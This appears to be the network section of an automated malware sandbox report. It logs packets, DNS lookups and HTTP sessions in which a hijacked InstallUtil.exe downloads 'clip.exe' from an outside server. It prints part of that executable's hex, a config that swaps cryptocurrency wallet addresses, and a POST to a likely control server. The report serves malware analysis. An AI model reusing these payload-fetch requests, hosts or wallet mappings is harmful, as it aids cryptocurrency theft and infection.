                                                                                                                Oct 8, 2024 05:00:13.440778971 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.440783024 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.440794945 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.440798998 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.440821886 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.440843105 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.440869093 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.440907955 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.441044092 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.441057920 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.441072941 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.441087008 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.441088915 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.441097975 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.441102028 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.441118956 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.441128969 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.441145897 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.441207886 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.441221952 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.441236973 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.441247940 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.441251040 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.441258907 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.441267014 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.441277981 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.441282034 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.441294909 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.441298008 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.441308975 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.441312075 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.441323996 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.441332102 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.441339016 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.441344976 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.441354036 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.441370964 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.441382885 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.473413944 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.473429918 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.473443985 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.473476887 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.473509073 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.473557949 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.473581076 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.473596096 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.473611116 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.473623991 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.473627090 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.473640919 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.473649025 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.473659039 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.473659992 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.473673105 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.473681927 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.473687887 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.473697901 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.473701954 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.473712921 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.473720074 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.473721027 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.473764896 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.473891020 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.473938942 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.473953009 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.473967075 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.473989964 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.474004984 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.474047899 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.474061966 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.474076986 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.474091053 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.474095106 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.474104881 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.474119902 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.474132061 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.474136114 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.474149942 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.474157095 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.474184036 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.474239111 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.474251032 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.474265099 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.474275112 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.474280119 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.474291086 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.474297047 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.474312067 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.474328041 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.474338055 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.474370956 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.474386930 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.474400043 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.474410057 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.474433899 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.474446058 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.474548101 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.474561930 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.474576950 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.474600077 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.474621058 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.474723101 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.474737883 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.474755049 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.474770069 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.474780083 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.474785089 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.474800110 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.474812031 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.474813938 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.474827051 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.474848986 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.951611996 CEST49868443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:13.951648951 CEST4434986849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.951711893 CEST49868443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:13.961838961 CEST49868443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:13.961853981 CEST4434986849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:14.156625986 CEST4987480192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:14.161746025 CEST8049874185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:14.161834002 CEST4987480192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:14.168716908 CEST4987480192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:14.178025007 CEST8049874185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:14.612956047 CEST4434986849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:14.613133907 CEST49868443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:14.613396883 CEST49868443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:14.613415003 CEST4434986849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:14.616050005 CEST49868443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:14.616065025 CEST4434986849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:14.868470907 CEST8049874185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:14.868527889 CEST4987480192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:15.499439001 CEST4434986849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:15.499488115 CEST49868443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:15.499496937 CEST4434986849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:15.499522924 CEST4434986849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:15.499535084 CEST49868443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:15.499558926 CEST49868443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:15.500173092 CEST49868443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:15.500190020 CEST4434986849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:15.502177000 CEST49882443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:15.502201080 CEST4434988249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:15.502274990 CEST49882443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:15.502506971 CEST49882443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:15.502520084 CEST4434988249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:16.150809050 CEST4434988249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:16.152280092 CEST49882443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:16.152647018 CEST49882443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:16.152657032 CEST4434988249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:16.154313087 CEST49882443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:16.154318094 CEST4434988249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:16.860508919 CEST4434988249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:16.860573053 CEST49882443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:16.860586882 CEST4434988249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:16.860631943 CEST49882443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:16.860678911 CEST4434988249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:16.860722065 CEST49882443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:16.860815048 CEST49882443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:16.860831022 CEST4434988249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:16.879749060 CEST4989180192.168.2.445.132.206.251
                                                                                                                Oct 8, 2024 05:00:16.885838032 CEST804989145.132.206.251192.168.2.4
                                                                                                                Oct 8, 2024 05:00:16.885900974 CEST4989180192.168.2.445.132.206.251
                                                                                                                Oct 8, 2024 05:00:16.886025906 CEST4989180192.168.2.445.132.206.251
                                                                                                                Oct 8, 2024 05:00:16.886065960 CEST4989180192.168.2.445.132.206.251
                                                                                                                Oct 8, 2024 05:00:16.890921116 CEST804989145.132.206.251192.168.2.4
                                                                                                                Oct 8, 2024 05:00:16.890949965 CEST804989145.132.206.251192.168.2.4
                                                                                                                Oct 8, 2024 05:00:16.890997887 CEST804989145.132.206.251192.168.2.4
                                                                                                                Oct 8, 2024 05:00:16.891024113 CEST804989145.132.206.251192.168.2.4
                                                                                                                Oct 8, 2024 05:00:16.891165018 CEST804989145.132.206.251192.168.2.4
                                                                                                                Oct 8, 2024 05:00:16.891191006 CEST804989145.132.206.251192.168.2.4
                                                                                                                Oct 8, 2024 05:00:17.634572029 CEST804989145.132.206.251192.168.2.4
                                                                                                                Oct 8, 2024 05:00:17.634663105 CEST4989180192.168.2.445.132.206.251
                                                                                                                Oct 8, 2024 05:00:21.841213942 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:21.841243982 CEST4989180192.168.2.445.132.206.251

                                                                                                                UDP Packets

                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Oct 8, 2024 04:59:35.545726061 CEST6200853192.168.2.41.1.1.1
                                                                                                                Oct 8, 2024 04:59:35.552685022 CEST53620081.1.1.1192.168.2.4
                                                                                                                Oct 8, 2024 05:00:16.870361090 CEST6268253192.168.2.41.1.1.1
                                                                                                                Oct 8, 2024 05:00:16.879143000 CEST53626821.1.1.1192.168.2.4

                                                                                                                DNS Queries

                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                Oct 8, 2024 04:59:35.545726061 CEST192.168.2.41.1.1.10x2dbdStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                Oct 8, 2024 05:00:16.870361090 CEST192.168.2.41.1.1.10x8e3aStandard query (0)cowod.hopto.orgA (IP address)IN (0x0001)false

                                                                                                                DNS Answers

                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                Oct 8, 2024 04:59:35.552685022 CEST1.1.1.1192.168.2.40x2dbdNo error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                Oct 8, 2024 05:00:16.879143000 CEST1.1.1.1192.168.2.40x8e3aNo error (0)cowod.hopto.org45.132.206.251A (IP address)IN (0x0001)false

                                                                                                                HTTP Request Dependency Graph

                                                                                                                • steamcommunity.com
                                                                                                                • 49.12.106.214
                                                                                                                • 185.215.113.117
                                                                                                                • cowod.hopto.org

                                                                                                                HTTP Packets

                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.449857185.215.113.117807648C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Oct 8, 2024 05:00:12.083702087 CEST102OUTGET /inc/clip.exe HTTP/1.1
                                                                                                                Host: 185.215.113.117
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Oct 8, 2024 05:00:12.784432888 CEST1236INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                Date: Tue, 08 Oct 2024 03:00:12 GMT
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Length: 519680
                                                                                                                Last-Modified: Fri, 13 Sep 2024 18:20:04 GMT
                                                                                                                Connection: keep-alive
                                                                                                                ETag: "66e48254-7ee00"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cf 18 ec ab 8b 79 82 f8 8b 79 82 f8 8b 79 82 f8 3f e5 73 f8 85 79 82 f8 3f e5 71 f8 05 79 82 f8 3f e5 70 f8 95 79 82 f8 26 27 81 f9 98 79 82 f8 26 27 87 f9 be 79 82 f8 26 27 86 f9 aa 79 82 f8 82 01 11 f8 8c 79 82 f8 8b 79 83 f8 ec 79 82 f8 3c 27 8b f9 88 79 82 f8 3c 27 80 f9 8a 79 82 f8 52 69 63 68 8b 79 82 f8 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 28 82 e4 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 a6 05 00 00 58 02 00 00 00 00 00 10 48 02 00 00 10 00 00 00 c0 05 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 40 08 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 [TRUNCATED]
                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$yyy?sy?qy?py&'y&'y&'yyyy<'y<'yRichyPEL(fXH@@@PB{ {@x.text `.rdatax@@.data!@.gfids@@.relocBD@B
                                                                                                                Oct 8, 2024 05:00:12.784471035 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 9c d1 47 00 e8 36 19 01 00 c7 05 9c d1 47 00 00 00 00 00 c7 05 a0 d1 47 00 00
                                                                                                                Data Ascii: G6GGGdhE4YUGshE3]UjG]UjG]UjGq]
                                                                                                                Oct 8, 2024 05:00:12.784503937 CEST1236INData Raw: 00 00 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a 00 b9 e8 bf 47 00 e8 61 1b 00 00 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a 00 b9 40 c0 47 00 e8 41 1b 00 00 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                Data Ascii: ]UjGa]Uj@GA]UjDG!]UjHG]UjPG]UjLG]UjTG]
                                                                                                                Oct 8, 2024 05:00:12.784535885 CEST1236INData Raw: ff ff 8b 7d d8 68 e9 78 47 00 8b cf e8 de 03 00 00 8b c7 8b 4d f4 64 89 0d 00 00 00 00 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 56 8b f1 e8 24 05 00 00 8b ce e8 ed 0a 00 00
                                                                                                                Data Ascii: }hxGMd_^[]UQV$>t?jM>ytfDAA@AuM@^]UVW}N;s[F;wT+$I;NuQFPP*NtEF
                                                                                                                Oct 8, 2024 05:00:12.784568071 CEST896INData Raw: 00 00 8b 06 89 30 c7 46 18 0f 00 00 00 83 7e 18 10 c7 46 14 00 00 00 00 72 05 8b 46 04 eb 03 8d 46 04 ff 75 0c 8b ce c6 00 00 ff 75 08 e8 29 03 00 00 8b c6 5e 5d c2 08 00 cc cc 55 8b ec 51 56 8b f1 8d 4d fc 6a 03 e8 7f f6 01 00 8b 06 85 c0 74 36
                                                                                                                Data Ascii: 0F~FrFFuu)^]UQVMjt6t18t,uW}Q;r;rIA8u_M^]WtcSVp_w;tfDI;uw$IO+jPVG
                                                                                                                Oct 8, 2024 05:00:12.784599066 CEST1236INData Raw: e8 d6 f8 01 00 83 c4 0c 83 ff fe 76 51 e9 d1 00 00 00 85 db 74 48 8b 56 18 8d 4e 04 83 fa 10 72 04 8b 01 eb 02 8b c1 3b d8 72 dd 83 fa 10 72 07 8b 01 89 45 08 eb 03 89 4d 08 8b 46 14 03 45 08 3b c3 76 c4 83 fa 10 72 02 8b 09 57 2b d9 8b ce 53 56
                                                                                                                Data Ascii: vQtHVNr;rrEMFE;vrW+SV_^[]9~svWth~r0F.u~~rF_^[]F_^[]FtWSP<~~rF8_^[]F8_^[]h+GN
                                                                                                                Oct 8, 2024 05:00:12.784631014 CEST1236INData Raw: 3b c3 77 05 e8 2e 25 02 00 50 e8 18 18 02 00 83 c4 04 8d 70 27 83 e6 e0 89 46 fc c7 46 f8 fa fa fa fa eb 0b 53 e8 fd 17 02 00 83 c4 04 8b f0 89 75 ec c7 45 fc 00 00 00 00 8b 4f 08 8b 47 04 2b c8 51 50 56 e8 2e 2d 02 00 83 c4 0c c7 45 fc ff ff ff
                                                                                                                Data Ascii: ;w.%Pp'FFSuEOG+QPV.-EOG+EtjG+PQ?t9jMytAA@Au@MfGEGwMd_^[]juuEjjY6
                                                                                                                Oct 8, 2024 05:00:12.784662962 CEST1236INData Raw: fc 00 00 00 00 3b de 74 1a 85 ff 74 08 53 8b cf e8 5e f1 ff ff 83 c7 1c 89 7d 08 83 c3 1c 89 5d e8 eb e2 c7 45 fc ff ff ff ff 8b c7 8b 4d f4 64 89 0d 00 00 00 00 5f 5e 5b 8b e5 5d c3 51 8b 55 08 8b 4d ec e8 5a ff ff ff 83 c4 04 6a 00 6a 00 e8 1e
                                                                                                                Data Ascii: ;ttS^}]EMd_^[]QUMZjj2GUEPjuuupQ|H]WEfAUEWVEVERE
                                                                                                                Oct 8, 2024 05:00:12.784693956 CEST1236INData Raw: c8 ff f0 0f c1 41 04 b8 00 00 00 00 0f 44 c1 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 89 41 04 8b c1 c7 01 80 c8 45 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc c7 01 44 c8 45 00 c3 cc cc cc cc cc cc cc cc cc 8b 49 04
                                                                                                                Data Ascii: ADUEAE]DEItPtjU<AESVuM HuHQMxuPtMHtM;^[]UEVDEt
                                                                                                                Oct 8, 2024 05:00:12.784725904 CEST1236INData Raw: 0c e8 15 74 03 00 eb 0a 79 0b ff 76 0c e8 09 0a 02 00 83 c4 04 ff 76 14 e8 fe 73 03 00 8b 45 08 83 c4 04 c7 06 44 c8 45 00 a8 01 74 1f a8 04 75 10 56 e8 e4 73 03 00 83 c4 04 8b c6 5e 5d c2 04 00 6a 18 56 e8 42 e4 ff ff 83 c4 08 8b c6 5e 5d c2 04
                                                                                                                Data Ascii: tyvvsEDEtuVs^]jVB^]UEVzGtjV^]VW;t!fDtF0j;u_^UEVzGtj$VF^]UEV
                                                                                                                Oct 8, 2024 05:00:12.789611101 CEST1236INData Raw: 43 45 e8 c7 07 00 00 00 00 c7 47 04 00 00 00 00 89 47 08 8b 5d e4 85 db 74 66 6a 03 8d 4d dc e8 03 db 01 00 8b 37 85 f6 74 43 83 c6 04 83 3e 00 74 19 0f 1f 44 00 00 8b 06 3b c7 74 09 83 78 04 00 8d 70 04 75 f1 83 3e 00 75 17 68 ca 00 00 00 68 50
                                                                                                                Data Ascii: CEGG]tfjM7tC>tD;txpu>uhhP,Gh,GXGCMG{GEPUM$lEr@jPu&EEPMEE%M}_CSh E


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                1192.168.2.449874185.215.113.117802472C:\Windows\SysWOW64\cmd.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Oct 8, 2024 05:00:14.168716908 CEST203OUTGET /nholman/ HTTP/1.1
                                                                                                                User-Agent: Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/74.0.3729.169Safari/537.36
                                                                                                                Host: 185.215.113.117
                                                                                                                Cache-Control: no-cache
                                                                                                                Oct 8, 2024 05:00:14.868470907 CEST471INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                Date: Tue, 08 Oct 2024 03:00:14 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: keep-alive
                                                                                                                Data Raw: 31 31 38 0d 0a 7b 0d 0a 20 20 22 70 61 74 74 65 72 6e 73 22 3a 20 7b 0d 0a 20 20 20 20 22 5e 28 28 62 63 31 5b 30 2d 39 41 2d 5a 61 2d 7a 5d 7b 33 32 2c 36 34 7d 29 7c 28 5b 31 33 5d 5b 61 2d 6b 6d 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 31 2d 39 5d 7b 32 35 2c 33 34 7d 29 29 24 22 3a 20 22 62 63 31 71 61 6a 6d 63 77 68 6c 6a 72 76 76 68 7a 68 37 67 76 6a 39 6c 6c 76 6a 71 75 30 6d 75 76 30 38 6e 7a 72 32 70 64 64 22 2c 0d 0a 20 20 20 20 22 5e 30 78 5b 61 2d 66 41 2d 46 30 2d 39 5d 7b 34 30 7d 24 22 3a 20 22 30 78 45 31 30 45 30 43 39 63 62 44 39 34 31 35 42 35 38 37 63 32 39 34 41 43 61 32 30 38 32 63 35 36 32 44 43 36 34 39 65 64 22 2c 0d 0a 20 20 20 20 22 54 5b 41 2d 5a 61 2d 7a 31 2d 39 5d 7b 33 33 7d 22 3a 20 22 54 55 54 36 78 52 48 67 4a 56 4c 61 6e 33 46 57 45 65 61 76 50 6a 76 50 47 6e 56 73 6d 39 47 47 36 37 22 0d 0a 20 20 7d 0d 0a 7d 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 118{ "patterns": { "^((bc1[0-9A-Za-z]{32,64})|([13][a-km-zA-HJ-NP-Z1-9]{25,34}))$": "bc1qajmcwhljrvvhzh7gvj9llvjqu0muv08nzr2pdd", "^0x[a-fA-F0-9]{40}$": "0xE10E0C9cbD9415B587c294ACa2082c562DC649ed", "T[A-Za-z1-9]{33}": "TUT6xRHgJVLan3FWEeavPjvPGnVsm9GG67" }}0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                2192.168.2.44989145.132.206.251807648C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Oct 8, 2024 05:00:16.886025906 CEST281OUTPOST / HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=----BFHJJJDAFBKEBGDGHCGD
                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
